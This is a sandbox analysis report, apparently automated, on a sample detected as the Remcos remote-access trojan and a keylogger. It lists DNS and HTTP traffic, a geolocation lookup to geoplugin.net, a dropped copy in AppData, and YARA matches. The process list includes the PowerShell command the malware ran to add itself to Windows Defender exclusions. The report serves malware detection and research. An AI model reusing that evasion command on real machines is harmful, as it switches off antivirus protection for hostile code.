Jan 4, 2025 18:42:06.296917915 CET | 1.1.1.1 | 192.168.2.4 | 0xda | No error (0) | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | star-azurefd-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:42:06.296917915 CET | 1.1.1.1 | 192.168.2.4 | 0xda | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:42:06.296917915 CET | 1.1.1.1 | 192.168.2.4 | 0xda | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Jan 4, 2025 18:42:06.323781013 CET | 1.1.1.1 | 192.168.2.4 | 0x3866 | No error (0) | js.monitor.azure.com | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:42:06.323781013 CET | 1.1.1.1 | 192.168.2.4 | 0x3866 | No error (0) | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | star-azurefd-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:42:07.117693901 CET | 1.1.1.1 | 192.168.2.4 | 0xcfcf | No error (0) | www.google.com | | 142.250.186.68 | A (IP address) | IN (0x0001) | false
Jan 4, 2025 18:42:07.118217945 CET | 1.1.1.1 | 192.168.2.4 | 0x2d09 | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
Jan 4, 2025 18:42:07.451646090 CET | 1.1.1.1 | 192.168.2.4 | 0xcc4f | No error (0) | consentdeliveryfd.azurefd.net | firstparty-azurefd-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:42:07.451646090 CET | 1.1.1.1 | 192.168.2.4 | 0xcc4f | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:42:07.451646090 CET | 1.1.1.1 | 192.168.2.4 | 0xcc4f | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Jan 4, 2025 18:42:07.451693058 CET | 1.1.1.1 | 192.168.2.4 | 0x2dfa | No error (0) | consentdeliveryfd.azurefd.net | firstparty-azurefd-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:42:07.453448057 CET | 1.1.1.1 | 192.168.2.4 | 0x4e83 | No error (0) | js.monitor.azure.com | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:42:07.453448057 CET | 1.1.1.1 | 192.168.2.4 | 0x4e83 | No error (0) | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | star-azurefd-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:42:07.453448057 CET | 1.1.1.1 | 192.168.2.4 | 0x4e83 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:42:07.453448057 CET | 1.1.1.1 | 192.168.2.4 | 0x4e83 | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Jan 4, 2025 18:42:07.454052925 CET | 1.1.1.1 | 192.168.2.4 | 0xf792 | No error (0) | js.monitor.azure.com | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:42:07.454052925 CET | 1.1.1.1 | 192.168.2.4 | 0xf792 | No error (0) | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | star-azurefd-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:42:11.793008089 CET | 1.1.1.1 | 192.168.2.4 | 0x5880 | No error (0) | mdec.nelreports.net | mdec.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:42:11.793114901 CET | 1.1.1.1 | 192.168.2.4 | 0x8814 | No error (0) | mdec.nelreports.net | mdec.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:42:12.968261003 CET | 1.1.1.1 | 192.168.2.4 | 0xa8ca | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:42:12.980036974 CET | 1.1.1.1 | 192.168.2.4 | 0xc4b9 | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:42:17.275834084 CET | 1.1.1.1 | 192.168.2.4 | 0xb0aa | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:42:17.283816099 CET | 1.1.1.1 | 192.168.2.4 | 0xa0b6 | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:43:08.837004900 CET | 1.1.1.1 | 192.168.2.4 | 0xc589 | No error (0) | consentdeliveryfd.azurefd.net | firstparty-azurefd-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:43:08.837004900 CET | 1.1.1.1 | 192.168.2.4 | 0xc589 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:43:08.837004900 CET | 1.1.1.1 | 192.168.2.4 | 0xc589 | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Jan 4, 2025 18:43:08.838015079 CET | 1.1.1.1 | 192.168.2.4 | 0xa592 | No error (0) | consentdeliveryfd.azurefd.net | firstparty-azurefd-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:43:08.850038052 CET | 1.1.1.1 | 192.168.2.4 | 0x348e | No error (0) | js.monitor.azure.com | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:43:08.850038052 CET | 1.1.1.1 | 192.168.2.4 | 0x348e | No error (0) | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | star-azurefd-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:43:08.850038052 CET | 1.1.1.1 | 192.168.2.4 | 0x348e | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:43:08.850038052 CET | 1.1.1.1 | 192.168.2.4 | 0x348e | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Jan 4, 2025 18:43:08.850831032 CET | 1.1.1.1 | 192.168.2.4 | 0x163c | No error (0) | js.monitor.azure.com | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:43:08.850831032 CET | 1.1.1.1 | 192.168.2.4 | 0x163c | No error (0) | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | star-azurefd-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:43:11.797528028 CET | 1.1.1.1 | 192.168.2.4 | 0xf6d | No error (0) | mdec.nelreports.net | mdec.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:43:11.797539949 CET | 1.1.1.1 | 192.168.2.4 | 0xa35c | No error (0) | mdec.nelreports.net | mdec.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:43:15.514040947 CET | 1.1.1.1 | 192.168.2.4 | 0x5556 | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:43:15.526670933 CET | 1.1.1.1 | 192.168.2.4 | 0xf920 | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:43:20.529654026 CET | 1.1.1.1 | 192.168.2.4 | 0x7380 | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:43:20.538919926 CET | 1.1.1.1 | 192.168.2.4 | 0x497a | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:44:07.225565910 CET | 1.1.1.1 | 192.168.2.4 | 0x681 | No error (0) | www.google.com | | 142.250.186.164 | A (IP address) | IN (0x0001) | false
Jan 4, 2025 18:44:07.227592945 CET | 1.1.1.1 | 192.168.2.4 | 0x2c6e | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
Jan 4, 2025 18:44:10.419363976 CET | 1.1.1.1 | 192.168.2.4 | 0x12cd | No error (0) | consentdeliveryfd.azurefd.net | firstparty-azurefd-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:44:10.419363976 CET | 1.1.1.1 | 192.168.2.4 | 0x12cd | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:44:10.419363976 CET | 1.1.1.1 | 192.168.2.4 | 0x12cd | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Jan 4, 2025 18:44:10.419527054 CET | 1.1.1.1 | 192.168.2.4 | 0x8259 | No error (0) | consentdeliveryfd.azurefd.net | firstparty-azurefd-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:44:10.423736095 CET | 1.1.1.1 | 192.168.2.4 | 0x8cff | No error (0) | js.monitor.azure.com | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:44:10.423736095 CET | 1.1.1.1 | 192.168.2.4 | 0x8cff | No error (0) | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | star-azurefd-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:44:10.423736095 CET | 1.1.1.1 | 192.168.2.4 | 0x8cff | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:44:10.423736095 CET | 1.1.1.1 | 192.168.2.4 | 0x8cff | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Jan 4, 2025 18:44:10.424508095 CET | 1.1.1.1 | 192.168.2.4 | 0xdd3f | No error (0) | js.monitor.azure.com | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:44:10.424508095 CET | 1.1.1.1 | 192.168.2.4 | 0xdd3f | No error (0) | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | star-azurefd-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:44:21.032882929 CET | 1.1.1.1 | 192.168.2.4 | 0xaa50 | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:44:21.036631107 CET | 1.1.1.1 | 192.168.2.4 | 0x2116 | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:44:30.729672909 CET | 1.1.1.1 | 192.168.2.4 | 0x932f | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:44:30.731539011 CET | 1.1.1.1 | 192.168.2.4 | 0xe8bc | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:45:11.832892895 CET | 1.1.1.1 | 192.168.2.4 | 0xc52f | No error (0) | mdec.nelreports.net | mdec.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:45:11.834832907 CET | 1.1.1.1 | 192.168.2.4 | 0xebf8 | No error (0) | mdec.nelreports.net | mdec.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:45:13.819253922 CET | 1.1.1.1 | 192.168.2.4 | 0xbfec | No error (0) | consentdeliveryfd.azurefd.net | firstparty-azurefd-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:45:13.819253922 CET | 1.1.1.1 | 192.168.2.4 | 0xbfec | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:45:13.819253922 CET | 1.1.1.1 | 192.168.2.4 | 0xbfec | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Jan 4, 2025 18:45:13.819689035 CET | 1.1.1.1 | 192.168.2.4 | 0x1c3a | No error (0) | consentdeliveryfd.azurefd.net | firstparty-azurefd-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:45:13.821937084 CET | 1.1.1.1 | 192.168.2.4 | 0x2b14 | No error (0) | js.monitor.azure.com | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:45:13.821937084 CET | 1.1.1.1 | 192.168.2.4 | 0x2b14 | No error (0) | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | star-azurefd-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:45:13.823463917 CET | 1.1.1.1 | 192.168.2.4 | 0x344d | No error (0) | js.monitor.azure.com | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:45:13.823463917 CET | 1.1.1.1 | 192.168.2.4 | 0x344d | No error (0) | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | star-azurefd-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:45:13.823463917 CET | 1.1.1.1 | 192.168.2.4 | 0x344d | No error (0) | shed.dual-low.s-part-0032.t-0009.t-msedge.net | s-part-0032.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:45:13.823463917 CET | 1.1.1.1 | 192.168.2.4 | 0x344d | No error (0) | s-part-0032.t-0009.t-msedge.net | | 13.107.246.60 | A (IP address) | IN (0x0001) | false
Jan 4, 2025 18:45:31.801892042 CET | 1.1.1.1 | 192.168.2.4 | 0xc958 | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:45:31.815570116 CET | 1.1.1.1 | 192.168.2.4 | 0xca5e | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:45:32.020581961 CET | 1.1.1.1 | 192.168.2.4 | 0x9e48 | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:45:32.021120071 CET | 1.1.1.1 | 192.168.2.4 | 0x3d3b | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:46:07.335469961 CET | 1.1.1.1 | 192.168.2.4 | 0xdc5f | No error (0) | www.google.com | | 142.250.185.164 | A (IP address) | IN (0x0001) | false
Jan 4, 2025 18:46:07.335668087 CET | 1.1.1.1 | 192.168.2.4 | 0x939e | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
Jan 4, 2025 18:46:11.831253052 CET | 1.1.1.1 | 192.168.2.4 | 0xca58 | No error (0) | mdec.nelreports.net | mdec.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 4, 2025 18:46:11.848225117 CET | 1.1.1.1 | 192.168.2.4 | 0x60fa | No error (0) | mdec.nelreports.net | mdec.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false
• https:
  • js.monitor.azure.com
• geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49737 | 178.237.33.50 | 80 | 7328 | C:\Users\user\AppData\Roaming\Graias\graias.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 18:41:58.580275059 CET | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Jan 4, 2025 18:41:59.198915005 CET | 1171 | IN | HTTP/1.1 200 OK
date: Sat, 04 Jan 2025 17:41:59 GMT
server: Apache
content-length: 963
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Ascii:
{
  "geoplugin_request":"8.46.123.189",
  "geoplugin_status":200,
  "geoplugin_delay":"1ms",
  "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",
  "geoplugin_city":"New York",
  "geoplugin_region":"New York",
  "geoplugin_regionCode":"NY",
  "geoplugin_regionName":"New York",
  "geoplugin_areaCode":"",
  "geoplugin_dmaCode":"501",
  "geoplugin_countryCode":"US",
  "geoplugin_countryName":"United States",
  "geoplugin_inEU":0,
  "geoplugin_euVATrate":false,
  "geoplugin_continentCode":"NA",
  "geoplugin_continentName":"North America",
  "geoplugin_latitude":"40.7123",
  "geoplugin_longitude":"-74.0068",
  "geoplugin_locationAccuracyRadius":"20",
  "geoplugin_timezone":"America\/New_York",
  "geoplugin_currencyCode":"USD",
  "geoplugin_currencySymbol":"$",
  "geoplugin_currencySymbol_UTF8":"$",
  "geoplugin_currencyConverter":0
}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49758 | 13.107.246.45 | 443 | 8096 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-04 17:42:06 UTC | 549 | OUT | GET /scripts/c/ms.jsll-4.min.js HTTP/1.1
Host: js.monitor.azure.com
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Referer: https://learn.microsoft.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2025-01-04 17:42:07 UTC | 889 | IN | HTTP/1.1 200 OK
Date: Sat, 04 Jan 2025 17:42:07 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 207935
Connection: close
Vary: Accept-Encoding
Cache-Control: no-transform, public, max-age=1800, immutable
Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
ETag: 0x8DCEC757C1AD1D1
x-ms-request-id: 275be117-b01e-0006-4a05-581325000000
x-ms-version: 2009-09-19
x-ms-meta-jssdkver: 4.3.3
x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
Access-Control-Allow-Origin: *
x-azure-ref: 20250104T174206Z-156796c549bndwlbhC1EWRbq0c0000000v10000000008thr
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes


Target ID: 0
Start time: 12:41:50
Start date: 04/01/2025
Path: C:\Users\user\Desktop\4XYAW8PbZH.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\4XYAW8PbZH.exe"
Imagebase: 0x4c0000
File size: 985'600 bytes
MD5 hash: 4A9440BAA61BE8363A372B0BBC5933AD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1832995156.0000000004425000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1832995156.0000000004425000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1832995156.0000000004425000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1832995156.0000000004425000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                            Start time:12:41:52
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4XYAW8PbZH.exe"
                                                                                                                                                                                            Imagebase:0x7f0000
                                                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                            Start time:12:41:52
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Users\user\Desktop\4XYAW8PbZH.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\4XYAW8PbZH.exe"
                                                                                                                                                                                            Imagebase:0x9d0000
                                                                                                                                                                                            File size:985'600 bytes
                                                                                                                                                                                            MD5 hash:4A9440BAA61BE8363A372B0BBC5933AD
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                            Start time:12:41:52
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                            Start time:12:41:53
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 1372
                                                                                                                                                                                            Imagebase:0xa50000
                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                            Start time:12:41:53
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Graias\graias.exe"
                                                                                                                                                                                            Imagebase:0x200000
                                                                                                                                                                                            File size:985'600 bytes
                                                                                                                                                                                            MD5 hash:4A9440BAA61BE8363A372B0BBC5933AD
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                            • Detection: 68%, ReversingLabs
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                            Start time:12:41:56
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Graias\graias.exe"
                                                                                                                                                                                            Imagebase:0x7f0000
                                                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                            Start time:12:41:56
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

